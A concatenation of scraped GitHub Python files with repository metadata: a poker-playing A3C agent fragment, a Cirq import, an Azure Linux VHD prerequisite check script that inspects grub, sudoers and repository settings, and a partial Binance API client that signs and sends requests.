self.s[card.point_rank, card.suit_rank + 4, 0] = 1
for card in info.person_state_history[-1].hand_cards:
self.s[card.point_rank, card.suit_rank + 4, 0] = 1
self.available_action = dict()
self.available_option = []
for action in list(info.person_state_history[-1].available_actions.values()):
option = action.option
if option not in self.available_option:
#对于 raise 只取第一个
self.available_option.append(option)
self.available_action[option] = action
def take_action(self):
a = self.a3c.choose_action(self.s, self.available_option, self.action_dict)
return self.available_action[a]
def reset(self):
passh
| {
"content_hash": "fa02c5a2137c01b78836bb6cac9565ba",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 95,
"avg_line_length": 40.5,
"alnum_prop": 0.6129898013955984,
"repo_name": "roomai/RoomAI",
"id": "8fee6b036d88c588fe693ec37625e54bec0de270",
"size": "2054",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "roomai/models/texasholdem/Texasholdem_A3CPlayer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "210116"
},
{
"name": "Shell",
"bytes": "2084"
}
],
"symlink_target": ""
} |
from cirq.contrib.bayesian_network.bayesian_network_gate import BayesianNetworkGate
| {
"content_hash": "f7f52be2c67f9e653b115ef4f53e8a5c",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 83,
"avg_line_length": 84,
"alnum_prop": 0.8809523809523809,
"repo_name": "quantumlib/Cirq",
"id": "4e030d410d56bf9701bfdf29ef4c4aa434092b7a",
"size": "669",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cirq-core/cirq/contrib/bayesian_network/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "4616"
},
{
"name": "HTML",
"bytes": "262"
},
{
"name": "JavaScript",
"bytes": "660"
},
{
"name": "Jupyter Notebook",
"bytes": "672675"
},
{
"name": "Makefile",
"bytes": "634"
},
{
"name": "Python",
"bytes": "8643017"
},
{
"name": "Scilab",
"bytes": "735"
},
{
"name": "Shell",
"bytes": "64230"
},
{
"name": "TypeScript",
"bytes": "91766"
}
],
"symlink_target": ""
} |
from azuremodules import *
import argparse
import sys
#for error checking
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--distro', help='Please mention which distro you are testing', required=True, type = str)
args = parser.parse_args()
distro = args.distro
def verify_default_targetpw(distro):
RunLog.info("Checking Defaults targetpw is commented or not..")
sudoers_out = Run("cat /etc/sudoers")
if "Defaults targetpw" in sudoers_out:
if "#Defaults targetpw" in sudoers_out:
print(distro+"_TEST_SUDOERS_VERIFICATION_SUCCESS")
RunLog.info("Defaults targetpw is commented")
return True
else:
RunLog.error("Defaults targetpw is present in /etc sudoers but it is not commented.")
print(distro+"_TEST_SUDOERS_VERIFICATION_FAIL")
return False
else:
RunLog.info("Defaults targetpw is not present in /etc/sudoers")
print(distro+"_TEST_SUDOERS_VERIFICATION_SUCCESS")
return True
def verify_grub(distro):
import os.path
RunLog.info("Checking console=ttyS0 rootdelay=300..")
if distro == "UBUNTU":
grub_out = Run("cat /etc/default/grub")
if distro == "SUSE":
if os.path.exists("/boot/grub2/grub.cfg"):
grub_out = Run("cat /boot/grub2/grub.cfg")
elif os.path.exists("/boot/grub/grub.conf"):
grub_out = Run("cat /boot/grub/grub.conf")
else:
RunLog.error("Unable to locate grub file")
print(distro+"_TEST_GRUB_VERIFICATION_FAIL")
return False
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT" or distro == "SLES" or distro == "FEDORA":
if os.path.isfile("/boot/grub2/grub.cfg"):
RunLog.info("Getting Contents of /boot/grub2/grub.cfg")
grub_out = Run("cat /boot/grub2/grub.cfg")
elif os.path.isfile("/boot/grub/menu.lst"):
RunLog.info("Getting Contents of /boot/grub/menu.lst")
grub_out = Run("cat /boot/grub/menu.lst")
else:
RunLog.error("Unable to locate grub file")
print(distro+"_TEST_GRUB_VERIFICATION_FAIL")
return False
if distro == "COREOS":
#in core os we don't have access to boot partition
grub_out = Run("dmesg")
if "console=ttyS0" in grub_out and "rootdelay=300" in grub_out and "libata.atapi_enabled=0" not in grub_out and "reserve=0x1f0,0x8" not in grub_out:
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT":
# check numa=off in grub for CentOS 6.x and Oracle Linux 6.x
version_release = Run("cat /etc/system-release | grep -Eo '[0-9].?[0-9]?' | head -1 | tr -d '\n'")
if float(version_release) < 6.6:
if "numa=off" in grub_out:
print(distro+"_TEST_GRUB_VERIFICATION_SUCCESS")
else :
RunLog.error("numa=off not present in etc/default/grub")
print(distro+"_TEST_GRUB_VERIFICATION_FAIL")
else:
print(distro+"_TEST_GRUB_VERIFICATION_SUCCESS")
else:
print(distro+"_TEST_GRUB_VERIFICATION_SUCCESS")
return True
else:
print(distro+"_TEST_GRUB_VERIFICATION_FAIL")
if "console=ttyS0" not in grub_out:
RunLog.error("console=ttyS0 not present")
if "rootdelay=300" not in grub_out:
RunLog.error("rootdelay=300 not present")
if "libata.atapi_enabled=0" in grub_out:
RunLog.error("libata.atapi_enabled=0 is present")
if "reserve=0x1f0,0x8" in grub_out:
RunLog.error("reserve=0x1f0,0x8 is present")
return False
def verify_network_manager(distro):
RunLog.info("Verifying that network manager is not installed")
n_out = Run ("rpm -q NetworkManager")
if "is not installed" in n_out:
RunLog.info("Network Manager is not installed")
print(distro+"_TEST_NETWORK_MANAGER_NOT_INSTALLED")
return True
else:
# NetworkManager package no longer conflicts with the wwagent on CentOS 7.0+ and Oracle Linux 7.0+
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT":
version_release = Run("cat /etc/system-release | grep -Eo '[0-9].?[0-9]?' | head -1 | tr -d '\n'")
if float(version_release) < 7.0:
RunLog.error("Network Manager is installed")
print(distro+"_TEST_NETWORK_MANAGER_INSTALLED")
return False
else:
RunLog.info("Network Manager is installed but not confict with waagent.")
print(distro+"_TEST_NETWORK_MANAGER_NOT_INSTALLED")
return True
else:
RunLog.error("Network Manager is installed")
print(distro+"_TEST_NETWORK_MANAGER_INSTALLED")
return False
def verify_network_file_in_sysconfig(distro):
import os.path
RunLog.info("Checking if network file exists in /etc/sysconfig")
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT" or distro == "FEDORA":
if os.path.isfile("/etc/sysconfig/network"):
RunLog.info("File Exists.")
n_out = Run("cat /etc/sysconfig/network")
if "networking=yes".upper() in n_out.upper():
RunLog.info("NETWORKING=yes present in network file")
print(distro+"_TEST_NETWORK_FILE_SUCCESS")
return True
else:
RunLog.error("NETWORKING=yes not present in network file")
print(distro+"_TEST_NETWORK_FILE_ERROR")
return False
else:
RunLog.error("File not present")
print(distro+"_TEST_NETWORK_FILE_ERROR")
return False
def verify_ifcfg_eth0(distro):
RunLog.info("Verifying contents of ifcfg-eth0 file")
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT" or distro == "FEDORA":
i_out = Run("cat /etc/sysconfig/network-scripts/ifcfg-eth0")
i_out = i_out.replace('"','')
#if "DEVICE=eth0" in i_out and "ONBOOT=yes" in i_out and "BOOTPROTO=dhcp" in i_out and "DHCP=yes" in i_out:
if "DEVICE=eth0" in i_out and "ONBOOT=yes" in i_out and "BOOTPROTO=dhcp" in i_out :
RunLog.info("all required parameters exists.")
print(distro+"_TEST_IFCFG_ETH0_FILE_SUCCESS")
return True
else:
if "DEVICE=eth0" not in i_out:
RunLog.error("DEVICE=eth0 not present in ifcfg-eth0")
if "ONBOOT=yes" not in i_out:
RunLog.error("ONBOOT=yes not present in ifcfg-eth0")
if "BOOTPROTO=dhcp" not in i_out:
RunLog.error("BOOTPROTO=dhcp not present in ifcfg-eth0")
#if "DHCP=yes" not in i_out:
# RunLog.error("DHCP=yes not present in ifcfg-eth0")
print(distro+"_TEST_IFCFG_ETH0_FILE_ERROR")
return False
def verify_udev_rules(distro):
import os.path
RunLog.info("Verifying if udev rules are moved to /var/lib/waagent/")
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT" or distro == "FEDORA":
if not os.path.isfile("/lib/udev/rules.d/75-persistent-net-generator.rules") and not os.path.isfile("/etc/udev/rules.d/70-persistent-net.rules"):
RunLog.info("rules are moved.")
print(distro+"_TEST_UDEV_RULES_SUCCESS")
return True
else:
if os.path.isfile("/lib/udev/rules.d/75-persistent-net-generator.rules"):
RunLog.error("/lib/udev/rules.d/75-persistent-net-generator.rules file present")
if os.path.isfile("/etc/udev/rules.d/70-persistent-net.rules"):
RunLog.error("/etc/udev/rules.d/70-persistent-net.rules file present")
print(distro+"_TEST_UDEV_RULES_ERROR")
return False
if distro == "COREOS":
if not os.path.isfile("/usr/lib64/udev/rules.d/75-persistent-net-generator.rules") and not os.path.isfile("/usr/lib64/udev/rules.d/70-persistent-net.rules"):
RunLog.info("rules are moved.")
print(distro+"_TEST_UDEV_RULES_SUCCESS")
return True
else:
if os.path.isfile("/usr/lib64/udev/rules.d/75-persistent-net-generator.rules"):
RunLog.error("/usr/lib64/udev/rules.d/75-persistent-net-generator.rules file present")
if os.path.isfile("/usr/lib64/udev/rules.d/70-persistent-net.rules"):
RunLog.error("/usr/lib64/udev/rules.d/70-persistent-net.rules file present")
print(distro+"_TEST_UDEV_RULES_ERROR")
return False
if distro == "UBUNTU":
RunLog.info("DISTRO PROVIDED : "+distro)
#Test 1 : verify that hv-kvp-daemon-init is installed or not, it's optional not strict.
RunLog.info("Checking if hv-kvp-daemon-init is installed or not..")
#kvp_install_status = Run("dpkg -s hv-kvp-daemon-init")
kvp_install_status = Run("pgrep -lf hv_kvp_daemon")
matchCount = 0
if "hv_kvp_daemon" in kvp_install_status:
matchCount = matchCount + 1
if matchCount == 1:
print(distro+"_TEST_KVP_INSTALLED")
else:
print(distro+"_TEST_KVP_NOT_INSTALLED")
#Test 2 : Make sure that repositories are installed.
RunLog.info("Checking if repositories are installed or not..")
repository_out = Run("apt-get update")
if "security.ubuntu.com" in repository_out and "azure.archive.ubuntu.com" in repository_out and "Hit" in repository_out:
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
print(distro+"_TEST_REPOSITORIES_ERROR")
#Test 3 : Make sure to have console=ttyS0 rootdelay=300 in /etc/default/grub.
result = verify_grub(distro)
#Test 4 : Make sure that default targetpw is commented in /etc/sudoers file.
result = verify_default_targetpw(distro)
if distro == "DEBIAN":
RunLog.info("DISTRO PROVIDED : "+distro)
#Test 1 : verify that hv-kvp-daemon-init is installed or not, it's optional not strict.
RunLog.info("Checking if hv-kvp-daemon-init is installed or not..")
kvp_install_status = Run("pgrep -lf hv_kvp_daemon")
matchCount = 0
if "hv_kvp_daemon" in kvp_install_status:
matchCount = matchCount + 1
if matchCount == 1:
print(distro+"_TEST_KVP_INSTALLED")
else:
print(distro+"_TEST_KVP_NOT_INSTALLED")
#Test 2 : Make sure that repositories are installed.
RunLog.info("Checking if repositories are installed or not..")
repository_out = Run("apt-get update")
if ( "deb.debian.org" in repository_out or "debian-archive.trafficmanager.net" in repository_out ) and "Hit" in repository_out:
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
print(distro+"_TEST_REPOSITORIES_ERROR")
#Test 3 : Make sure that default targetpw is commented in /etc/sudoers file.
result = verify_default_targetpw(distro)
if distro == "SUSE":
#Make sure that distro contains Cloud specific repositories
RunLog.info("Verifying Cloud specific repositories")
Oss_repo_count = Run("zypper lr | grep -vi debug | grep -vi non | grep Oss | wc -l | tr -d '\n'")
Update_repo_count = Run("zypper lr | grep -vi debug | grep -vi non | grep Update | wc -l | tr -d '\n'")
Oss_repo_enable_refresh = Run("zypper lr | grep -vi debug | grep -vi non | grep Oss | grep -o Yes | wc -l | tr -d '\n'")
Update_repo_enable_refresh = Run("zypper lr | grep -vi debug | grep -vi non | grep Update | grep -o Yes | wc -l | tr -d '\n'")
if int(Oss_repo_count) > 0 and int(Update_repo_count) > 0:
RunLog.info("All expected repositories are present")
if int(Oss_repo_enable_refresh) >= 2 and int(Update_repo_enable_refresh) >= 2:
RunLog.info("All expected repositories are enabled and refreshed")
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
RunLog.error("One or more expected repositories are not enabled/refreshed.")
print(distro+"_TEST_REPOSITORIES_ERROR")
else:
RunLog.error("One or more expected repositories are not present")
print(distro+"_TEST_REPOSITORIES_ERROR")
#Verify Grub
result = verify_grub(distro)
#Test : Make sure that default targetpw is commented in /etc/sudoers file.
result = verify_default_targetpw(distro)
if distro == "CENTOS":
#Test 1 : Make sure Network Manager is not installed
result = verify_network_manager(distro)
result = verify_network_file_in_sysconfig(distro)
result = verify_ifcfg_eth0(distro)
result = verify_udev_rules(distro)
#Verify repositories
r_out = Run("yum repolist")
if "base" in r_out and "updates" in r_out:
RunLog.info("Expected repositories are present")
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
if "base" not in r_out:
RunLog.error("Base repository not present")
if "updates" not in r_out:
RunLog.error("Updates repository not present")
print(distro+"_TEST_REPOSITORIES_ERROR")
#Verify etc/yum.conf
y_out = Run("cat /etc/yum.conf")
# check http_caching=packages in yum.conf for CentOS 6.x
version_release = Run("cat /etc/system-release | grep -Eo '[0-9].?[0-9]?' | head -1 | tr -d '\n'")
if float(version_release) < 6.6:
if "http_caching=packages" in y_out:
RunLog.info("http_caching=packages present in /etc/yum.conf")
print(distro+"_TEST_YUM_CONF_SUCCESS")
else:
RunLog.error("http_caching=packages not present in /etc/yum.conf")
print(distro+"_TEST_YUM_CONF_ERROR")
else:
print(distro+"_TEST_YUM_CONF_SUCCESS")
result = verify_grub(distro)
if distro == "REDHAT" or distro == "FEDORA":
#Test 1 : Make sure Network Manager is not installed
result = verify_default_targetpw(distro)
result = verify_network_manager(distro)
result = verify_network_file_in_sysconfig(distro)
result = verify_ifcfg_eth0(distro)
result = verify_udev_rules(distro)
#Verify repositories
r_out = Run("yum repolist")
if "base" in r_out and "updates" in r_out:
RunLog.info("Expected repositories are present")
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
if "base" not in r_out:
RunLog.error("Base repository not present")
if "updates" not in r_out:
RunLog.error("Updates repository not present")
print(distro+"_TEST_REPOSITORIES_ERROR")
if distro == "REDHAT":
ra_out = Run("yum repolist all | grep 'rhui-rhel-' | wc -l")
if(ra_out > 5):
RunLog.info("yum repolist all status: Success, repo count = %s", ra_out)
print(distro+"_TEST_RHUIREPOSITORIES_AVAILABLE")
else:
RunLog.error("yum repolist all status: Fail, repo count = %s", ra_out)
print(distro+"_TEST_RHUIREPOSITORIES_ERROR")
#Verify etc/yum.conf
version_release = Run("cat /etc/system-release | grep -Eo '[0-9].?[0-9]?' | head -1 | tr -d '\n'")
if float(version_release) < 6.6:
if "http_caching=packages" in y_out:
RunLog.info("http_caching=packages present in /etc/yum.conf")
print(distro+"_TEST_YUM_CONF_SUCCESS")
else:
RunLog.error("http_caching=packages not present in /etc/yum.conf")
print(distro+"_TEST_YUM_CONF_ERROR")
else:
print(distro+"_TEST_YUM_CONF_SUCCESS")
result = verify_grub(distro)
if distro == "ORACLELINUX":
#Test 1 : Make sure Network Manager is not installed
result = verify_network_manager(distro)
result = verify_network_file_in_sysconfig(distro)
result = verify_ifcfg_eth0(distro)
result = verify_udev_rules(distro)
#Verify repositories
r_out = Run("yum repolist")
if "latest" in r_out:
RunLog.info("Expected latest repositories are present")
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
RunLog.error("Expected latest repository not present")
print(distro+"_TEST_REPOSITORIES_ERROR")
# no need to verify yum.conf since http_caching is not required for Oracle Linux.
result = verify_grub(distro)
if distro == "SLES":
#Verify Repositories..
r_out = Run("zypper lr")
if "Pool" in r_out and "Updates" in r_out:
RunLog.info("All expected repositories are present")
RunLog.info("All expected repositories are enabled and refreshed")
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
RunLog.error("One or more expected repositories are not present")
print(distro+"_TEST_REPOSITORIES_ERROR")
#Verify Grub
result = verify_grub(distro)
#Verify sudoers file
result = verify_default_targetpw(distro)
#Vefiry : It is recommended that you set /etc/sysconfig/network/dhcp or equivalent from DHCLIENT_SET_HOSTNAME="yes" to DHCLIENT_SET_HOSTNAME="no"
RunLog.info('Checking recommended setting if DHCLIENT_SET_HOSTNAME="no" present in /etc/sysconfig/network/dhcp')
d_out = Run("cat /etc/sysconfig/network/dhcp")
if 'DHCLIENT_SET_HOSTNAME="no"' in d_out:
RunLog.info('DHCLIENT_SET_HOSTNAME="no" present in /etc/sysconfig/network/dhcp')
else:
RunLog.info("DHCLIENT_SET_HOSTNAME='no' not present in /etc/sysconfig/network/dhcp, it's not strict.")
if distro == "COREOS":
#"rootdelay=300" has issues with CoreOS which causes extra long boot time
#result = verify_grub(distro)
result = verify_udev_rules(distro)
| {
"content_hash": "ecd1217addae9755ebc2bb421a081bf5",
"timestamp": "",
"source": "github",
"line_count": 373,
"max_line_length": 159,
"avg_line_length": 41.9544235924933,
"alnum_prop": 0.7077129529043389,
"repo_name": "konkasoftci/azure-linux-automation",
"id": "059e28c1d63e1f50c3aee83c6d42feddd1771adb",
"size": "15668",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "remote-scripts/BVT-VERIFY-VHD-PREREQUISITES.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "20007"
},
{
"name": "PowerShell",
"bytes": "1982984"
},
{
"name": "Python",
"bytes": "267947"
},
{
"name": "Shell",
"bytes": "317794"
}
],
"symlink_target": ""
} |
import hmac
import hashlib
import time
import requests
import pandas as pd
import numpy as np
import inspect
import logging
import sys
# need to deal with version
version= '0.1.2'
class Binance:
def __init__(self, logger=None):
# set up logging handler and suppress 'No handlers' message by adding NullHandler
# note that handler/format/etc setup needs to be specified in the calling program
# for any of the logger messages in this module to print
self.logger = logger or logging.getLogger(__name__)
self.logger.addHandler(logging.NullHandler())
def __version__(self):
# not sure if this is how I'm supposed to do it
return version
def setAPIKey(self, apikey):
#
# ---- DESCRIPTION ---
# sets apikey
#
# ---- INPUTS ---
# apikey: the apikey
#
# ---- OUTUTS ---
# returns 1
self.apikey = apikey
return 1
def setSecretKey(self, secret):
#
# ---- DESCRIPTION ---
# sets secret
#
# ---- INPUTS ---
# secret: the secret key
#
# ---- OUTUTS ---
# returns 1
self.secret = secret
return 1
def sendHTTPRequest(self, path, verb='get', query_string='',myheaders={}):
# this is an internal function that sends HTTP requests for other functions in this class
baseurl = 'https://www.binance.com'
url = baseurl + path
self.logger.debug("path is %s",path)
self.logger.debug("verb is %s",verb)
self.logger.debug("query_string is %s",query_string)
self.logger.debug("myheaders is %s",myheaders)
if (verb.lower() == 'get'):
r = requests.get(url, params=query_string, headers=myheaders)
elif (verb.lower() == 'post'):
r = requests.post(url, params=query_string, headers=myheaders)
elif (verb.lower() == 'delete'):
r = requests.delete(url, params=query_string, headers=myheaders)
# to do
# - check and handle different response codes
return r
def requestSender(self, path, verb, queryParams={}, expected={}, signed=False):
# this is an internal function that sends the request and checks the return value
# check values passed in against the definition provided by Binance
self.logger.info("queryParams contains %s",queryParams)
if(self.validateParams(queryParams,expected)):
# get query_string and sign as necessary
query_string = self.getQueryString(queryParams)
self.logger.info("query string is %s", query_string)
myheaders={}
if (signed):
# Check if secret key is set. For type = Signed both signature and api key required.
try:
self.secret
except:
self.logger.error("secret key not set, perhaps call setSecretKey?")
return 0
# Check if API key is set. For type = Signed both signature and api key required.
try:
self.apikey
except:
self.logger.error("API key not set, perhaps call setAPIKey?")
return 0
self.logger.debug("API key setting being used is %s",self.apikey)
myheaders = {'X-MBX-APIKEY':self.apikey}
query_string = query_string + '&signature=' + self.getSignature(self.secret,query_string)
self.logger.info("signed query string is %s", query_string)
# send off the request
try:
r = self.sendHTTPRequest(path, verb, query_string,myheaders).json()
except:
self.logger.error("HTTP error, returning 0")
return 0
else:
self.logger.error("aok failed, return 0 in final else")
return 0
self.logger.info("successful, returning r")
self.logger.debug("r is %s",r)
return r
def getSignature(self, secretKey, totalParams):
#
# ---- DESCRIPTION ---
# Creates a signature for payloads as described in the
# Binance API documentation under the heading
# SIGNED Endpoint Examples for POST /api/v3/order
#
# ---- INPUTS ---
# secretKey: the secret key
# totalParams: the message we're wanting to hash. Per the documentation,
#
# totalParams is defined as the query string concatenated with the request body.
#
# ---- OUTUTS ---
# hexdigest formatted HMAC SHA256 signature
self.logger.info("signature is %s", hmac.new(secretKey, msg=totalParams, digestmod=hashlib.sha256).hexdigest())
return hmac.new(secretKey, msg=totalParams, digestmod=hashlib.sha256).hexdigest()
def getQueryString(self, queryParams):
#
# ---- DESCRIPTION ---
# Assembles query parameters into a query string
#
# ---- INPUTS ---
# validated (by validateParams) python dictionary of input parameters
# ex. {'symbol':'SALTBTC','limit':5}
#
#
# ---- OUTUTS ---
# HTTP query string
#
# ---- NOTES ---
queryString=''
for key, value in queryParams.iteritems():
if (type(value) == int):
value = str(value)
elif (type(value) == float):
# remove scientific notation formatting in float, 8 characters of precision
value = '{:.8f}'.format(value)
value = str(value)
queryString = queryString + key + '=' + value + '&'
self.logger.debug("adding key and value to queryString %s %s", key, value)
# we need to remove the final & here, hence [:-1]
self.logger.debug("final queryString is %s", queryString[:-1])
return queryString[:-1]
def getTimestamp(self,queryParams={}):
#
# ---- DESCRIPTION ---
# Check for and create a millisecond timestamp to include in SIGNED requests
#
# ---- INPUTS ---
# queryParams dictionary
#
# ---- OUTUTS ---
# queryParams dictionary or 0 if there is an error
#
if('timestamp' in queryParams):
if ((len(str(queryParams['timestamp'])) == 13)):
# strings actually fool this but it gets caught later in the type validation
self.logger.info("found valid user provided timestamp %s",queryParams['timestamp'])
return queryParams
else:
self.logger.error("user provided timestamp invalid %s",queryParams['timestamp'])
return 0
else:
queryParams['timestamp'] = int(round(time.time() * 1000))
self.logger.info("did not find user provided timestamp, generated %s",queryParams['timestamp'])
return queryParams
def testConnectivity(self):
#
# ---- DESCRIPTION ---
# Checks the server connectivity with GET /api/v1/ping
#
# ---- INPUTS ---
# None:
#
# ---- OUTUTS ---
# HTTP status code of the request to this URL
#
path = '/api/v1/ping'
verb = 'get'
r = self.sendHTTPRequest(path, verb)
self.logger.debug("HTTP response code to %s is %s", path, r)
return r.status_code
def getServerTime(self):
#
# ---- DESCRIPTION ---
# Gets the server time with GET /api/v1/time
#
# ---- INPUTS ---
# None:
#
# ---- OUTUTS ---
# The value in the serverTime attribute of the resulting json file
#
path = '/api/v1/time'
verb = 'get'
r = self.sendHTTPRequest(path,verb).json()
self.logger.debug("serverTime is is %s", r['serverTime'])
return r['serverTime']
def getSymbols(self):
#
# ---- DESCRIPTION ---
# Gets a list of valid symbols currently traded on Binance. This is
# used as input validation for 'symbol' in most API calls
#
# ---- INPUTS ---
# none
#
# ---- OUTUTS ---
# returns python list of current available symbols
#
# ---- NOTES ---
# They do not offer an API function for this so we use /api/v1/ticker/allPrices
# to get a list of current prices for all assets and just extract the names
# of the assets from there to check our symbol against
path = '/api/v1/ticker/allPrices'
verb = 'get'
symbols = []
try:
r = self.sendHTTPRequest(path,verb).json()
except:
self.logger.error("HTTP error, returning 0")
return 0
for i in r:
symbols.append(i['symbol'])
self.logger.debug("symbols is %s", symbols)
return symbols
def validateParams(self,queryParams, expected):
# this is an internal function that validates parameters passed in against
# the parameter specifications of the API
#
# returns 1 if things are fine, 0 if not
#
if (not expected.empty): # make sure expected has values in it
for key, value in queryParams.iteritems():
self.logger.debug("testing key %s",key)
# mark all parameters in queryParams in expected['FOUND']
if expected['NAME'].str.contains(key).any():
a = expected.index[expected['NAME'].str.match(key)]
expected.set_value(a,'FOUND',True)
else:
self.logger.error("key not found %s",key)
return 0
# Check the type. Could be improved
paramType = str(type(value)).split("\'")[1] # this extracts the string that is the type
self.logger.debug("paramType calculated is %s", paramType)
self.logger.debug("comparison is to %s", expected.iloc[a]['TYPE'].any())
if(not paramType == expected.iloc[a]['TYPE'].any()):
self.logger.error("type mismatch, return 0, %s %s %s", key, value, paramType)
return 0
else:
self.logger.debug("no type mismatch, %s %s %s", key, value, paramType)
# check if values exceed MAXIMUM, if provided
if ('MAXIMUM' in expected.columns and expected.iloc[a]['MAXIMUM'].any()):
if (queryParams[key] > expected.loc[expected['NAME'] == key,'MAXIMUM'].iloc[0]):
self.logger.info("key %s exceeded MAXIMUM %s, return 0", key, str(int(expected.loc[expected['NAME'] == key,'MAXIMUM'].iloc[0])))
return 0
else:
self.logger.debug("no maximum for %s", key)
# see if expected['VALID'] is set. This indicates enum values, so we check these against the
# values passed in and return an error if the value is not in the enum
#if (expected.iloc[a]['VALID'].any()):
if ('VALID' in expected.columns and expected.iloc[a]['VALID'].any()):
self.logger.debug("expected.iloc[a]['VALID'].any() is %s", expected.iloc[a]['VALID'].any())
if(not value in expected.iloc[a]['VALID'].any()):
self.logger.error("key %s with value %s not found in %s, return 0", key, value, expected.iloc[a]['VALID'].any())
return 0
else:
self.logger.debug("no enum for %s", key)
# see if there are any cases expected['FOUND'] == False and expected['MANDATORY'] == True
# this indicates that a required parameter was not found
if (len(expected[(expected['FOUND'] == False) & (expected['MANDATORY'] == True)]) > 0):
self.logger.error("mandatory columns missing return 0 %s", expected[(expected['FOUND'] == False) & (expected['MANDATORY'] == True)])
return 0
return 1
else: # if no values in expected, make sure queryParams is also empty
if (any(queryParams)):
# expected is empty but queryParams is not
self.logger.error("expected is empty but queryParams contains unexpected values, return 0 ")
return 0
else:
# both expected and queryParams are empty
return 1
def getOrderBook(self, queryParams):
#
# ---- DESCRIPTION ---
# Gets the order book for a given asset with GET /api/v1/depth
#
# ---- INPUTS ---
# python dictionary of input parameters
# ex. {'symbol':'SALTBTC','limit':5}
#
#
# ---- OUTUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
# The documentation says limit <= 100 but seems to be at odds with how the system behaves.
# Trying various values resulted in an error message
# {"code":-1100,"msg":"Illegal characters found in parameter 'limit';
# legal range is '50, 20, 100, 500, 5, 200, 10'."}
# No other values seem to work aside from the list above, so we value check the input for limit
# to make sure it is in the legal range
# valid values
enumSymbols = self.getSymbols()
enumLimit = [5,10,20,50,100,200,500]
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'limit','TYPE':'int','MANDATORY':False,'DEFAULT':100,'FOUND':False,'MAXIMUM':500,'VALID':enumLimit}, ignore_index=True)
# API specific inputs
path = '/api/v1/depth'
verb = 'get'
return self.requestSender(path, verb, queryParams, expected)
def getAggTrades(self, queryParams):
#
# ---- DESCRIPTION ---
# Gets the compressed, aggregated trades from GET /api/v1/aggTrades
#
# ---- INPUTS ---
# python dictionary of input parameters
# ex. {'symbol':'SALTBTC','limit':5,'startTime':1507045646123,'endTime':1507045646456,'fromId':11234}
#
# ---- OUTUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# Limit uses 500 for values > 500 (i.e. if limit = 6000 then 500 rows are returned). Really large values
# return an error, so the logic in this function will set limit = 500 if the passed value exceeds 500
#
# The documentation specifies a type of LONG for fromId, startTime, and endTime. Python evaluates a 13
# digit number (such as an epoch time in ms) as an int, so the type we specify in expected is int for these.
# This should keep floats or strings from sneaking by and we add some checks to make sure the values are reasonable.
#
# valid values
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'limit','TYPE':'int','MANDATORY':False,'DEFAULT':500,'FOUND':False,'MAXIMUM':500}, ignore_index=True)
expected = expected.append({'NAME':'fromId','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'startTime','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'endTime','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v1/aggTrades'
verb = 'get'
# API specific checks for startTime, endTime, and limit
# Per the documentation: "If both startTime and endTime are sent, limit should not be sent
# AND the distance between startTime and endTime must be less than 24 hours."
if (('startTime' in queryParams) and ('endTime' in queryParams)):
if ((len(str(queryParams['startTime'])) == 13) and (len(str(queryParams['endTime'])) == 13)):
if ((queryParams['endTime'] - queryParams['startTime']) < 1000*60*60*24):
# remove limit if startTime and endTime are set, valid, and have appropriate range
queryParams.pop('limit',None)
self.logger.info("removed queryParams['limit'] due to presense of startTime and endTime")
else:
self.logger.error("difference betweeen startTime and endTime > 24 hours , return 0 ")
return 0
else:
self.logger.error("startTime and/or endTime contain invalid values , return 0 ")
return 0
else:
if('startTime' in queryParams):
self.logger.error("startTime present, endTime missing , return 0 ")
return 0
elif('endTime' in queryParams):
self.logger.error("endTime present, startTime missing , return 0 ")
return 0
else:
self.logger.info ("both endTime and startTime missing , proceeding ")
return self.requestSender(path, verb, queryParams, expected)
def getKline(self, queryParams):
#
# ---- DESCRIPTION ---
# Gets the kline intervals from GET /api/v1/kline
#
# ---- INPUTS ---
# python dictionary of input parameters
# ex. {'symbol':'SALTBTC','limit':5,'startTime':1507045646123,'endTime':1507045646456,'interval':'5m'}
#
# ---- OUTUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# pandas dataframe containing parameter definitions from Binance API documentation
# valid values
enumSymbols = self.getSymbols()
enumIntervals = ['1m','3m','5m','15m','30m','1h','2h','4h','6h' '8h','12h','1d','3d','1w','1M']
expected = pd.DataFrame()
